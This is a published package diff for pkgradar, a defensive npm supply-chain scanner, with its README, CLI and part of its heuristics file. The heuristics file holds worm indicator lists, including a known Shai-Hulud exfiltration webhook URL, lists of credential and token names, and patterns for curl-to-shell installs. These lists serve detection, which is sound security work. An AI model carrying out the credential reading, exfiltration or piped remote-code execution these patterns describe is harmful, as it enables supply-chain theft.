pkgradar 0.1.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/LICENSE +21 -0
- package/README.md +155 -0
- package/bin/pkgradar.js +158 -0
- package/data/allowlist.json +16 -0
- package/lib/checks.js +228 -0
- package/lib/osv.js +100 -0
- package/lib/scan.js +86 -0
- package/lib/stores.js +96 -0
- package/package.json +44 -0
package/LICENSE
ADDED
|
@@ -0,0 +1,21 @@
|
|
|
1
|
+
MIT License
|
|
2
|
+
|
|
3
|
+
Copyright (c) 2026 Nilay Rajderkar
|
|
4
|
+
|
|
5
|
+
Permission is hereby granted, free of charge, to any person obtaining a copy
|
|
6
|
+
of this software and associated documentation files (the "Software"), to deal
|
|
7
|
+
in the Software without restriction, including without limitation the rights
|
|
8
|
+
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
|
9
|
+
copies of the Software, and to permit persons to whom the Software is
|
|
10
|
+
furnished to do so, subject to the following conditions:
|
|
11
|
+
|
|
12
|
+
The above copyright notice and this permission notice shall be included in all
|
|
13
|
+
copies or substantial portions of the Software.
|
|
14
|
+
|
|
15
|
+
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
|
16
|
+
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
|
17
|
+
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
|
18
|
+
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
|
19
|
+
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
|
20
|
+
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
|
|
21
|
+
SOFTWARE.
|
package/README.md
ADDED
|
@@ -0,0 +1,155 @@
|
|
|
1
|
+
# pkgradar
|
|
2
|
+
|
|
3
|
+
A supply-chain scanner that reads the bytes you actually installed, not just the package names.
|
|
4
|
+
|
|
5
|
+
```
|
|
6
|
+
npx pkgradar
|
|
7
|
+
```
|
|
8
|
+
|
|
9
|
+
That is the whole thing. One command, no install, no config. It scans your project and every package cache on the machine, and tells you whether anything looks like malware.
|
|
10
|
+
|
|
11
|
+
## Why this exists
|
|
12
|
+
|
|
13
|
+
A lot of "supply-chain" CLIs work like this: download a list of advisories, check whether any package *name* in your project appears on it, print a scary verdict. So you run one, and it tells you something like:
|
|
14
|
+
|
|
15
|
+
```
|
|
16
|
+
Verdict: potential supply-chain exposure - 3 package hits
|
|
17
|
+
zod-to-json-schema@3.25.2
|
|
18
|
+
lightningcss-darwin-arm64@1.30.2
|
|
19
|
+
```
|
|
20
|
+
|
|
21
|
+
...even though `zod-to-json-schema` is a perfectly normal package downloaded millions of times a week, and the version you have was never touched. The advisory just *mentioned* that package's ecosystem. Name matching cannot tell the difference between "this package was trojanized" and "this package shares a name with something in a writeup".
|
|
22
|
+
|
|
23
|
+
`pkgradar` does the opposite. It opens the files. For every package it finds on disk it checks:
|
|
24
|
+
|
|
25
|
+
- **Install hooks that detonate.** `preinstall` / `install` / `postinstall` scripts, scored by whether they spawn processes, pipe `curl | bash`, read `~/.npmrc` / `~/.ssh` / `~/.aws/credentials`, or reference `NPM_TOKEN` / `GITHUB_TOKEN` / cloud credentials. (`prepare` is ignored on purpose: it does not run when a package is installed as a dependency.)
|
|
26
|
+
- **Known worm artifacts.** Files like `setup_bun.sh`, `bun_environment.js`, `migrate-repos.sh`, hard-coded Shai-Hulud exfiltration endpoints, and the rest of the Shai-Hulud / "Mini Shai-Hulud" indicator set. A bundled GitHub Actions workflow that runs a piped shell download or exfiltrates secrets is flagged too.
|
|
27
|
+
- **Obfuscated or packed payloads.** The `javascript-obfuscator` `_0x...` fingerprint, `eval` / `new Function` over `atob` / `Buffer.from(base64)`, `child_process` fed from decoded data, large base64 blobs. The "this file is just minified" signals are deliberately demoted so a normal bundled CLI does not drown the report.
|
|
28
|
+
- **Manifest oddities.** `bin` entries pointing outside the package or at a shell script.
|
|
29
|
+
- **Known advisories, precisely (optional).** With `--online` it cross-references [OSV.dev](https://osv.dev) by exact `(name, version)`, so you get real GHSA / CVE IDs instead of name collisions, and each advisory is reported at its own severity, so a moderate ReDoS in a dev tool does not shout as loud as an RCE.
|
|
30
|
+
|
|
31
|
+
A small curated allowlist (`data/allowlist.json`) downgrades benign-but-trippy findings on famous packages (`vercel`, `corepack`, `core-js`, `esbuild`, and so on) to `INFO`. It never suppresses a hard worm indicator, because "a trusted package suddenly ships a worm" is exactly the attack worth catching.
|
|
32
|
+
|
|
33
|
+
## How it works
|
|
34
|
+
|
|
35
|
+
```
|
|
36
|
+
npx pkgradar
|
|
37
|
+
|
|
|
38
|
+
v
|
|
39
|
+
+-----------------------------------------------------------+
|
|
40
|
+
| 1. DISCOVER STORES |
|
|
41
|
+
| where package code is extracted on this machine |
|
|
42
|
+
| |
|
|
43
|
+
| project node_modules pnpm in-project store (.pnpm) |
|
|
44
|
+
| npm global root npx ephemeral cache (~/.npm/_npx) |
|
|
45
|
+
| bun cache yarn v1 cache yarn berry zips |
|
|
46
|
+
| pnpm global store |
|
|
47
|
+
+-----------------------------------------------------------+
|
|
48
|
+
|
|
|
49
|
+
v
|
|
50
|
+
+-----------------------------------------------------------+
|
|
51
|
+
| 2. WALK EACH STORE |
|
|
52
|
+
| yield every package directory found |
|
|
53
|
+
| dedupe by name @ version @ path |
|
|
54
|
+
+-----------------------------------------------------------+
|
|
55
|
+
|
|
|
56
|
+
v
|
|
57
|
+
+-----------------------------------------------------------+
|
|
58
|
+
| 3. INSPECT THE BYTES (per package, budgeted) |
|
|
59
|
+
| |
|
|
60
|
+
| +-------------------+ reads package.json scripts |
|
|
61
|
+
| | lifecycle-hook | pre/install/postinstall |
|
|
62
|
+
| +-------------------+ scored by what they touch |
|
|
63
|
+
| |
|
|
64
|
+
| +-------------------+ walks the package tree |
|
|
65
|
+
| | worm-ioc-file | matches known artifact names |
|
|
66
|
+
| | embedded-workflow | inspects bundled CI workflows |
|
|
67
|
+
| +-------------------+ |
|
|
68
|
+
| |
|
|
69
|
+
| +-------------------+ reads .js files (<= 1.5MB head |
|
|
70
|
+
| | suspicious-js | + 96KB tail, <= 24MB per pkg) |
|
|
71
|
+
| +-------------------+ obfuscation / eval / exfil combo |
|
|
72
|
+
| |
|
|
73
|
+
| +-------------------+ reads package.json bin |
|
|
74
|
+
| | odd-bin | |
|
|
75
|
+
| +-------------------+ |
|
|
76
|
+
+-----------------------------------------------------------+
|
|
77
|
+
|
|
|
78
|
+
+--------------+--------------+
|
|
79
|
+
| |
|
|
80
|
+
(--online only) |
|
|
81
|
+
v |
|
|
82
|
+
+---------------------------+ |
|
|
83
|
+
| 4. OSV.dev cross-check | |
|
|
84
|
+
| querybatch -> which | |
|
|
85
|
+
| pkgs have advisories | |
|
|
86
|
+
| then /v1/query each | |
|
|
87
|
+
| -> real severity | |
|
|
88
|
+
+---------------------------+ |
|
|
89
|
+
| |
|
|
90
|
+
+--------------+--------------+
|
|
91
|
+
|
|
|
92
|
+
v
|
|
93
|
+
+-----------------------------------------------------------+
|
|
94
|
+
| 5. ALLOWLIST PASS |
|
|
95
|
+
| downgrade benign findings on famous packages to INFO |
|
|
96
|
+
| (never a hard worm indicator) |
|
|
97
|
+
+-----------------------------------------------------------+
|
|
98
|
+
|
|
|
99
|
+
v
|
|
100
|
+
+-----------------------------------------------------------+
|
|
101
|
+
| 6. REPORT |
|
|
102
|
+
| verdict line, findings grouped by severity, |
|
|
103
|
+
| coloured badges, evidence paths, what-to-do |
|
|
104
|
+
| exit 0 clean / 1 findings / 2 error |
|
|
105
|
+
+-----------------------------------------------------------+
|
|
106
|
+
```
|
|
107
|
+
|
|
108
|
+
A finding object looks like this:
|
|
109
|
+
|
|
110
|
+
```
|
|
111
|
+
+------------------------------------------------------+
|
|
112
|
+
| package name of the package |
|
|
113
|
+
| version version on disk |
|
|
114
|
+
| store which store it was found in |
|
|
115
|
+
| code lifecycle-hook | worm-ioc-file | |
|
|
116
|
+
| suspicious-js | odd-bin | osv-advisory ... |
|
|
117
|
+
| severity CRITICAL | HIGH | MEDIUM | LOW | INFO |
|
|
118
|
+
| message what tripped, in plain words |
|
|
119
|
+
| evidence the file path or script line that did it |
|
|
120
|
+
| dir full path to the package on disk |
|
|
121
|
+
+------------------------------------------------------+
|
|
122
|
+
```
|
|
123
|
+
|
|
124
|
+
## Usage
|
|
125
|
+
|
|
126
|
+
```bash
|
|
127
|
+
npx pkgradar # scan the current project plus every cache on this machine
|
|
128
|
+
npx pkgradar --online # also cross-check OSV.dev advisories by exact version
|
|
129
|
+
npx pkgradar --min-sev high # only show HIGH and CRITICAL (good for CI)
|
|
130
|
+
npx pkgradar --json # machine-readable output
|
|
131
|
+
```
|
|
132
|
+
|
|
133
|
+
Exit codes: `0` clean, `1` findings at or above `--min-sev`, `2` scanner error. In CI: `npx pkgradar --min-sev high`.
|
|
134
|
+
|
|
135
|
+
| flag | meaning |
|
|
136
|
+
|---|---|
|
|
137
|
+
| `--online` | also query OSV.dev for known advisories (needs network) |
|
|
138
|
+
| `--json` | machine-readable output |
|
|
139
|
+
| `--min-sev LEVEL` | `critical`, `high`, `medium`, `low`, `info` (default `medium`) |
|
|
140
|
+
| `--stores LIST` | limit to `project,pnpm-project,npm-global,npx-cache,bun-cache,yarn-cache,yarn-berry` |
|
|
141
|
+
| `--no-allowlist` | do not downgrade findings on well-known packages |
|
|
142
|
+
| `--max-depth N` | max `node_modules` nesting depth (default `12`) |
|
|
143
|
+
| `--cwd DIR` | project directory to scan (default `.`) |
|
|
144
|
+
|
|
145
|
+
## What it is not
|
|
146
|
+
|
|
147
|
+
These are heuristics. They surface candidates, not verdicts. A clean run means "nothing tripped the checks on the bytes that are present", not "this is proven safe". A finding on a big bundled CLI is often a false positive, which is what the allowlist is for. A finding with a worm indicator string or a `curl | bash` postinstall is not a false positive. Read the evidence line, then decide.
|
|
148
|
+
|
|
149
|
+
Current coverage gaps, on the roadmap: yarn-berry packages are matched by name only (the zip archives are not opened yet), the pnpm global store and the npm `_cacache` tarballs are not extracted and scanned, and there is no npm-provenance / attestation check or typosquat-distance check yet.
|
|
150
|
+
|
|
151
|
+
`pkgradar` reads files only. It never executes any package code, install script, or workflow. Zero runtime dependencies, Node 18 or newer, built-ins only, which feels right for a tool you are meant to trust about your dependencies.
|
|
152
|
+
|
|
153
|
+
## License
|
|
154
|
+
|
|
155
|
+
MIT
|
package/bin/pkgradar.js
ADDED
|
@@ -0,0 +1,158 @@
|
|
|
1
|
+
#!/usr/bin/env node
|
|
2
|
+
'use strict';
|
|
3
|
+
const os = require('os');
|
|
4
|
+
const { scan, SEV } = require('../lib/scan');
|
|
5
|
+
|
|
6
|
+
const args = process.argv.slice(2);
|
|
7
|
+
const has = (f) => args.includes(f);
|
|
8
|
+
const val = (f, d) => { const i = args.indexOf(f); return i >= 0 && args[i + 1] ? args[i + 1] : d; };
|
|
9
|
+
|
|
10
|
+
if (has('-h') || has('--help')) {
|
|
11
|
+
console.log(`pkgradar - content-based supply-chain scanner for npm / pnpm / yarn / bun
|
|
12
|
+
|
|
13
|
+
It opens the package files you actually installed and looks for what malware
|
|
14
|
+
does (install hooks, obfuscated payloads, known worm artifacts), instead of
|
|
15
|
+
just matching package names against an advisory list.
|
|
16
|
+
|
|
17
|
+
USAGE
|
|
18
|
+
npx pkgradar [options]
|
|
19
|
+
|
|
20
|
+
OPTIONS
|
|
21
|
+
--online also cross-reference OSV.dev for known advisories (network)
|
|
22
|
+
--json machine-readable output
|
|
23
|
+
--min-sev LEVEL report findings at or above LEVEL
|
|
24
|
+
critical | high | medium | low | info [default: medium]
|
|
25
|
+
--stores LIST comma list to limit which stores are scanned
|
|
26
|
+
project, pnpm-project, npm-global, npx-cache,
|
|
27
|
+
bun-cache, yarn-cache, yarn-berry
|
|
28
|
+
--no-allowlist do not downgrade findings on well-known packages
|
|
29
|
+
--max-depth N max node_modules nesting depth [default: 12]
|
|
30
|
+
--cwd DIR project directory to scan [default: .]
|
|
31
|
+
-h, --help
|
|
32
|
+
|
|
33
|
+
EXIT CODES
|
|
34
|
+
0 clean 1 findings at or above --min-sev 2 scanner error
|
|
35
|
+
`);
|
|
36
|
+
process.exit(0);
|
|
37
|
+
}
|
|
38
|
+
|
|
39
|
+
const SEV_FROM_NAME = { critical: SEV.CRITICAL, high: SEV.HIGH, medium: SEV.MEDIUM, low: SEV.LOW, info: SEV.INFO };
|
|
40
|
+
const minSevName = (val('--min-sev', 'medium') || 'medium').toLowerCase();
|
|
41
|
+
const minSev = SEV_FROM_NAME[minSevName] ?? SEV.MEDIUM;
|
|
42
|
+
|
|
43
|
+
const useColor = process.stdout.isTTY && !process.env.NO_COLOR;
|
|
44
|
+
const e = (code) => useColor ? `\x1b[${code}m` : '';
|
|
45
|
+
const wrap = (code) => (s) => useColor ? `\x1b[${code}m${s}\x1b[0m` : `${s}`;
|
|
46
|
+
const C = {
|
|
47
|
+
bold: wrap('1'), dim: wrap('2'), red: wrap('31'), grn: wrap('32'), ylw: wrap('33'),
|
|
48
|
+
blu: wrap('34'), mag: wrap('35'), cyan: wrap('36'), gray: wrap('90'),
|
|
49
|
+
};
|
|
50
|
+
// severity badge: white text on a coloured background, padded
|
|
51
|
+
const badge = (sev) => {
|
|
52
|
+
const bg = { CRITICAL: '41', HIGH: '45', MEDIUM: '43', LOW: '100', INFO: '100' }[sev] || '100';
|
|
53
|
+
const fg = sev === 'MEDIUM' ? '30' : '97';
|
|
54
|
+
const label = ` ${sev} `.padEnd(10);
|
|
55
|
+
return useColor ? `\x1b[${bg};${fg};1m${label}\x1b[0m` : `[${sev}]`.padEnd(10);
|
|
56
|
+
};
|
|
57
|
+
const SEV_TEXT = { CRITICAL: C.red, HIGH: C.mag, MEDIUM: C.ylw, LOW: C.gray, INFO: C.gray };
|
|
58
|
+
const homeShort = (p) => (p && p.startsWith(os.homedir())) ? '~' + p.slice(os.homedir().length) : p;
|
|
59
|
+
|
|
60
|
+
function rule(ch = '─', n = 64) { return C.gray(ch.repeat(n)); }
|
|
61
|
+
|
|
62
|
+
(async () => {
|
|
63
|
+
let res;
|
|
64
|
+
const started = Date.now();
|
|
65
|
+
try {
|
|
66
|
+
res = await scan({
|
|
67
|
+
cwd: val('--cwd', process.cwd()),
|
|
68
|
+
online: has('--online'),
|
|
69
|
+
minSev,
|
|
70
|
+
maxDepth: parseInt(val('--max-depth', '12'), 10) || 12,
|
|
71
|
+
stores: (val('--stores', '') || '').split(',').map((s) => s.trim()).filter(Boolean),
|
|
72
|
+
noAllowlist: has('--no-allowlist'),
|
|
73
|
+
});
|
|
74
|
+
} catch (err) {
|
|
75
|
+
console.error(C.red('pkgradar error: ') + (err && err.stack || err));
|
|
76
|
+
process.exit(2);
|
|
77
|
+
}
|
|
78
|
+
const secs = ((Date.now() - started) / 1000).toFixed(1);
|
|
79
|
+
|
|
80
|
+
if (has('--json')) {
|
|
81
|
+
console.log(JSON.stringify({ ...res, durationSeconds: Number(secs) }, null, 2));
|
|
82
|
+
process.exit(res.findings.some((f) => f.sevNum >= minSev) ? 1 : 0);
|
|
83
|
+
}
|
|
84
|
+
|
|
85
|
+
const counts = { CRITICAL: 0, HIGH: 0, MEDIUM: 0, LOW: 0, INFO: 0 };
|
|
86
|
+
for (const f of res.findings) counts[f.severity]++;
|
|
87
|
+
const localFindings = res.findings.filter((f) => f.code !== 'osv-advisory');
|
|
88
|
+
const osvFindings = res.findings.filter((f) => f.code === 'osv-advisory');
|
|
89
|
+
const hits = res.findings.length;
|
|
90
|
+
const worst = ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW', 'INFO'].find((k) => counts[k]) || null;
|
|
91
|
+
|
|
92
|
+
// ---- header ----
|
|
93
|
+
console.log('');
|
|
94
|
+
console.log(` ${C.bold('pkgradar')} ${C.gray('v' + require('../package.json').version)} ${C.gray('content-based supply-chain scan')}`);
|
|
95
|
+
console.log(` ${C.gray('project')} ${homeShort(res.cwd)} ${C.gray(res.stores.length + ' stores, ' + secs + 's')}`);
|
|
96
|
+
console.log('');
|
|
97
|
+
|
|
98
|
+
// ---- stores table ----
|
|
99
|
+
const nameW = Math.max(...res.stores.map((s) => s.kind.length), 6);
|
|
100
|
+
for (const s of res.stores) {
|
|
101
|
+
console.log(` ${C.cyan(s.kind.padEnd(nameW))} ${C.dim(String(s.packages).padStart(5) + ' pkgs')} ${C.gray(homeShort(s.root))}`);
|
|
102
|
+
}
|
|
103
|
+
console.log(` ${C.gray('total:')} ${C.bold(res.totalPackages)} ${C.gray('unique package@version,')} ${C.bold(res.totalScanned)} ${C.gray('locations inspected')}`);
|
|
104
|
+
if (res.osv && res.osv.error) console.log(` ${C.ylw('OSV lookup failed:')} ${C.dim(res.osv.error)}`);
|
|
105
|
+
if (!res.osv && !has('--online')) console.log(` ${C.gray('tip: add')} ${C.dim('--online')} ${C.gray('to also cross-check known advisories on OSV.dev')}`);
|
|
106
|
+
console.log('');
|
|
107
|
+
|
|
108
|
+
// ---- verdict line ----
|
|
109
|
+
if (!hits) {
|
|
110
|
+
console.log(` ${C.grn('●')} ${C.bold('Verdict:')} ${C.grn('clean')} ${C.gray('- nothing tripped the heuristics at')} ${C.dim(minSevName)} ${C.gray('and above')}`);
|
|
111
|
+
console.log(` ${C.gray(' (this inspects installed bytes; a clean run is not a proof of safety)')}`);
|
|
112
|
+
console.log('');
|
|
113
|
+
process.exit(0);
|
|
114
|
+
}
|
|
115
|
+
const summaryBits = ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW', 'INFO'].filter((k) => counts[k]).map((k) => SEV_TEXT[k](`${counts[k]} ${k.toLowerCase()}`));
|
|
116
|
+
const dot = worst === 'CRITICAL' || worst === 'HIGH' ? C.red('●') : worst === 'MEDIUM' ? C.ylw('●') : C.gray('●');
|
|
117
|
+
console.log(` ${dot} ${C.bold('Verdict:')} ${C.bold(hits + (hits === 1 ? ' finding' : ' findings'))} ${C.gray('(')}${summaryBits.join(C.gray(', '))}${C.gray(')')}`);
|
|
118
|
+
if (localFindings.length && osvFindings.length) {
|
|
119
|
+
console.log(` ${C.gray(' ' + localFindings.length + ' from inspecting installed code, ' + osvFindings.length + ' known advisories (OSV.dev)')}`);
|
|
120
|
+
}
|
|
121
|
+
console.log('');
|
|
122
|
+
|
|
123
|
+
// ---- findings, grouped by severity, local first then OSV ----
|
|
124
|
+
const ORDER = ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW', 'INFO'];
|
|
125
|
+
const printGroup = (title, list) => {
|
|
126
|
+
if (!list.length) return;
|
|
127
|
+
console.log(` ${rule()}`);
|
|
128
|
+
console.log(` ${C.bold(title)}`);
|
|
129
|
+
console.log('');
|
|
130
|
+
list.sort((a, b) => b.sevNum - a.sevNum || a.package.localeCompare(b.package));
|
|
131
|
+
for (const f of list) {
|
|
132
|
+
console.log(` ${badge(f.severity)} ${C.bold(f.package + '@' + f.version)} ${C.gray(f.store)} ${C.cyan(f.code)}`);
|
|
133
|
+
console.log(` ${f.message}`);
|
|
134
|
+
if (f.evidence) console.log(` ${C.gray('→ ' + f.evidence)}`);
|
|
135
|
+
if (f.note) console.log(` ${C.gray('note: ' + f.note)}`);
|
|
136
|
+
if (f.dir) console.log(` ${C.gray(homeShort(f.dir))}`);
|
|
137
|
+
console.log('');
|
|
138
|
+
}
|
|
139
|
+
};
|
|
140
|
+
printGroup('From inspecting installed code', localFindings);
|
|
141
|
+
printGroup('Known advisories (OSV.dev)', osvFindings);
|
|
142
|
+
|
|
143
|
+
// ---- next steps ----
|
|
144
|
+
console.log(` ${rule()}`);
|
|
145
|
+
console.log(` ${C.bold('What to do')}`);
|
|
146
|
+
if (counts.CRITICAL || counts.HIGH) {
|
|
147
|
+
console.log(` ${C.red('•')} Treat ${C.bold('CRITICAL / HIGH "installed code" findings')} as suspect: do not run install`);
|
|
148
|
+
console.log(` scripts, remove the package, clear the relevant cache, and rotate any npm /`);
|
|
149
|
+
console.log(` GitHub / cloud tokens this machine has held.`);
|
|
150
|
+
}
|
|
151
|
+
console.log(` ${C.gray('•')} Check a flagged version against the registry: ${C.dim('npm view <pkg> versions')} ${C.gray('and look at')}`);
|
|
152
|
+
console.log(` ${C.gray('publish dates and provenance.')}`);
|
|
153
|
+
if (osvFindings.length) console.log(` ${C.gray('•')} OSV findings are the usual "known CVE in a dependency" set: ${C.dim('npm audit fix')} ${C.gray('/ bump.')}`);
|
|
154
|
+
if (!has('--online')) console.log(` ${C.gray('•')} Re-run with ${C.dim('--online')} ${C.gray('to add OSV.dev advisory matching by exact version.')}`);
|
|
155
|
+
console.log('');
|
|
156
|
+
|
|
157
|
+
process.exit(res.findings.some((f) => f.sevNum >= minSev) ? 1 : 0);
|
|
158
|
+
})();
|
|
@@ -0,0 +1,16 @@
|
|
|
1
|
+
{
|
|
2
|
+
"_comment": "Packages whose own first-party code is widely audited and known to trip the heuristics for benign reasons (bundled CLIs that read env tokens + hit the network, funding-message postinstalls, etc.). Findings on these are downgraded to INFO with a note. Match is by exact package name or by '@scope/' prefix entries ending in '/*'. Keep this list conservative — it is the one place a real compromise could hide, so entries should be famous, high-visibility packages only.",
|
|
3
|
+
"names": [
|
|
4
|
+
"core-js", "core-js-pure", "core-js-compat",
|
|
5
|
+
"esbuild", "@esbuild/*",
|
|
6
|
+
"vercel", "@vercel/*", "create-next-app", "next", "@next/*",
|
|
7
|
+
"corepack", "npm", "@npmcli/*", "pnpm", "yarn",
|
|
8
|
+
"d3", "d3-array", "d3-scale", "@edge-runtime/*",
|
|
9
|
+
"webpack", "rollup", "vite", "turbo", "@turbo/*",
|
|
10
|
+
"typescript", "ts-node", "tsx",
|
|
11
|
+
"playwright", "playwright-core", "@playwright/*", "puppeteer", "puppeteer-core",
|
|
12
|
+
"sharp", "@img/*",
|
|
13
|
+
"@sentry/*", "@clerk/*", "firebase", "@firebase/*", "aws-sdk", "@aws-sdk/*",
|
|
14
|
+
"node-gyp", "prebuild-install", "node-pre-gyp", "@mapbox/node-pre-gyp"
|
|
15
|
+
]
|
|
16
|
+
}
|
package/lib/checks.js
ADDED
|
@@ -0,0 +1,228 @@
|
|
|
1
|
+
'use strict';
|
|
2
|
+
// Content-based heuristics. Each check inspects the bytes actually on disk for one
|
|
3
|
+
// package and returns zero or more findings: { sev, code, msg, evidence }.
|
|
4
|
+
const fs = require('fs');
|
|
5
|
+
const path = require('path');
|
|
6
|
+
|
|
7
|
+
const SEV = { CRITICAL: 4, HIGH: 3, MEDIUM: 2, LOW: 1, INFO: 0 };
|
|
8
|
+
|
|
9
|
+
// ---- Known Shai-Hulud / Mini-Shai-Hulud worm indicators (filenames & content markers) ----
|
|
10
|
+
const WORM_FILENAMES = [
|
|
11
|
+
'setup_bun.sh', 'setup_bun.js', 'bun_environment.js',
|
|
12
|
+
'shai-hulud-workflow.yml', 'shai-hulud.yaml', 'shai-hulud.yml',
|
|
13
|
+
'processor.sh', 'migrate-repos.sh', 'cloud.json', 'contents.json', 'environment.json',
|
|
14
|
+
'truffleSecrets.json', 'actionsSecrets.json',
|
|
15
|
+
];
|
|
16
|
+
// High-confidence exfiltration endpoints / payload constants seen in Shai-Hulud-family
|
|
17
|
+
// worms. A mention of the string "shai-hulud" alone is NOT here on purpose — security
|
|
18
|
+
// tools (including this one) legitimately contain that word.
|
|
19
|
+
const WORM_HARD_MARKERS = [
|
|
20
|
+
'webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7',
|
|
21
|
+
'eyJ3ZWJob29rIjp7InVybCI6', // base64 of the worm's config preamble
|
|
22
|
+
'hxxps://', // defanged URL only ever appears in payloads, never real code
|
|
23
|
+
];
|
|
24
|
+
// "Soft" markers: only meaningful when several co-occur in one file.
|
|
25
|
+
const WORM_SOFT_MARKERS = [
|
|
26
|
+
'shai-hulud', 'Shai-Hulud', 'shaihulud',
|
|
27
|
+
'truffleSecrets', 'actionsSecrets', 'NpmModuleListWebhook',
|
|
28
|
+
'migrate-repos', 'setup_bun', 'bun_environment',
|
|
29
|
+
];
|
|
30
|
+
const SECRET_NAMES = [
|
|
31
|
+
'NPM_TOKEN', 'NPM_CONFIG_TOKEN', 'NODE_AUTH_TOKEN', 'GITHUB_TOKEN', 'GH_TOKEN', 'GHP_',
|
|
32
|
+
'AWS_ACCESS_KEY', 'AWS_SECRET_ACCESS_KEY', 'AWS_SESSION_TOKEN',
|
|
33
|
+
'GCP_', 'GOOGLE_APPLICATION_CREDENTIALS', 'AZURE_', 'DIGITALOCEAN_TOKEN',
|
|
34
|
+
'SLACK_TOKEN', 'STRIPE_', 'OPENAI_API_KEY', 'ANTHROPIC_API_KEY',
|
|
35
|
+
];
|
|
36
|
+
const NET_TOKENS = ['curl ', 'wget ', 'http://', 'https://', 'fetch(', 'net.connect', 'dns.lookup', 'request(', 'axios', 'XMLHttpRequest'];
|
|
37
|
+
const EXEC_TOKENS = ['child_process', 'execSync', 'spawnSync', 'exec(', 'spawn(', 'node -e', 'node --eval', 'eval(', 'Function(', 'vm.runInThisContext'];
|
|
38
|
+
const ENCODE_TOKENS = ['base64 -d', "from('", 'Buffer.from(', 'atob(', 'fromCharCode', 'unescape('];
|
|
39
|
+
|
|
40
|
+
function readSafe(p, max = 2_000_000) {
|
|
41
|
+
try {
|
|
42
|
+
const st = fs.statSync(p);
|
|
43
|
+
if (st.size > max) return { truncated: true, text: fs.readFileSync(p, 'utf8').slice(0, max), size: st.size };
|
|
44
|
+
return { truncated: false, text: fs.readFileSync(p, 'utf8'), size: st.size };
|
|
45
|
+
} catch { return null; }
|
|
46
|
+
}
|
|
47
|
+
|
|
48
|
+
// 1. Lifecycle install hooks (the #1 detonation vector)
|
|
49
|
+
function checkLifecycleHooks(pkg) {
|
|
50
|
+
const out = [];
|
|
51
|
+
const s = (pkg.manifest && pkg.manifest.scripts) || {};
|
|
52
|
+
// Only the hooks that fire when a package is installed *as a dependency from the
|
|
53
|
+
// registry*. `prepare` is excluded: it only runs on local installs / git deps.
|
|
54
|
+
const HOOKS = ['preinstall', 'install', 'postinstall'];
|
|
55
|
+
for (const h of HOOKS) {
|
|
56
|
+
const cmd = s[h];
|
|
57
|
+
if (!cmd) continue;
|
|
58
|
+
const c = cmd.trim();
|
|
59
|
+
// common, well-known native-build / tooling hooks
|
|
60
|
+
const benign = /^(node-gyp\b|prebuild-install\b|node-pre-gyp\b|cmake-js\b|napi\b|neon\b|install-from-cache\b|node-waf\b|husky\b|patch-package\b|opencollective\b|node-pre-gyp\b)/.test(c)
|
|
61
|
+
|| /^(node\s+)?(scripts\/)?install(\.js)?$/.test(c)
|
|
62
|
+
|| /^(ng-?ccc?|ngcc)\b/.test(c);
|
|
63
|
+
const hits = new Set();
|
|
64
|
+
for (const t of [...NET_TOKENS, ...EXEC_TOKENS, ...ENCODE_TOKENS]) if (cmd.includes(t)) hits.add(t);
|
|
65
|
+
for (const t of SECRET_NAMES) if (cmd.toUpperCase().includes(t)) hits.add(t);
|
|
66
|
+
if (cmd.includes('.npmrc') || cmd.includes('/.ssh/') || cmd.includes('.aws/credentials')) hits.add('credential-file');
|
|
67
|
+
const piped = /\b(curl|wget|fetch)\b[^|;&]*[|;&]+\s*(ba|z|d)?sh\b/.test(cmd) || /\|\s*node\b/.test(cmd);
|
|
68
|
+
|
|
69
|
+
let sev;
|
|
70
|
+
if (hits.size >= 3 || piped) sev = SEV.CRITICAL;
|
|
71
|
+
else if (hits.size >= 1) sev = SEV.HIGH;
|
|
72
|
+
else if (benign) sev = SEV.INFO;
|
|
73
|
+
else sev = SEV.LOW; // an unrecognised install hook — worth a glance, not an alarm
|
|
74
|
+
out.push({ sev, code: 'lifecycle-hook', msg: `${h} script${hits.size ? ', touches: ' + [...hits].join(', ') : (benign ? ' (recognised build tool)' : ' (unrecognised command)')}`, evidence: `"${h}": ${cmd.slice(0, 240)}` });
|
|
75
|
+
}
|
|
76
|
+
return out;
|
|
77
|
+
}
|
|
78
|
+
|
|
79
|
+
// 2. Worm IOC files sitting inside the package
|
|
80
|
+
function checkWormFiles(pkg) {
|
|
81
|
+
if (!pkg.dir) return [];
|
|
82
|
+
const out = [];
|
|
83
|
+
const stack = [pkg.dir];
|
|
84
|
+
let budget = 4000;
|
|
85
|
+
while (stack.length && budget-- > 0) {
|
|
86
|
+
const d = stack.pop();
|
|
87
|
+
let ents;
|
|
88
|
+
try { ents = fs.readdirSync(d, { withFileTypes: true }); } catch { continue; }
|
|
89
|
+
for (const e of ents) {
|
|
90
|
+
if (e.name === 'node_modules') continue;
|
|
91
|
+
const full = path.join(d, e.name);
|
|
92
|
+
if (e.isDirectory()) { stack.push(full); continue; }
|
|
93
|
+
const low = e.name.toLowerCase();
|
|
94
|
+
if (WORM_FILENAMES.some((w) => low === w.toLowerCase())) {
|
|
95
|
+
out.push({ sev: SEV.CRITICAL, code: 'worm-ioc-file', msg: `known worm artifact file: ${e.name}`, evidence: path.relative(pkg.dir, full) });
|
|
96
|
+
}
|
|
97
|
+
if (/(^|[\\/])\.github[\\/]workflows([\\/]|$)/.test(d) && /\.ya?ml$/i.test(low)) {
|
|
98
|
+
// Many legit packages publish their whole repo (incl. .github). On its own this
|
|
99
|
+
// is barely a signal, so it is INFO. A *malicious* workflow file would also be
|
|
100
|
+
// caught by name (worm-ioc-file) or by content checks.
|
|
101
|
+
const wf = readSafe(full, 200_000);
|
|
102
|
+
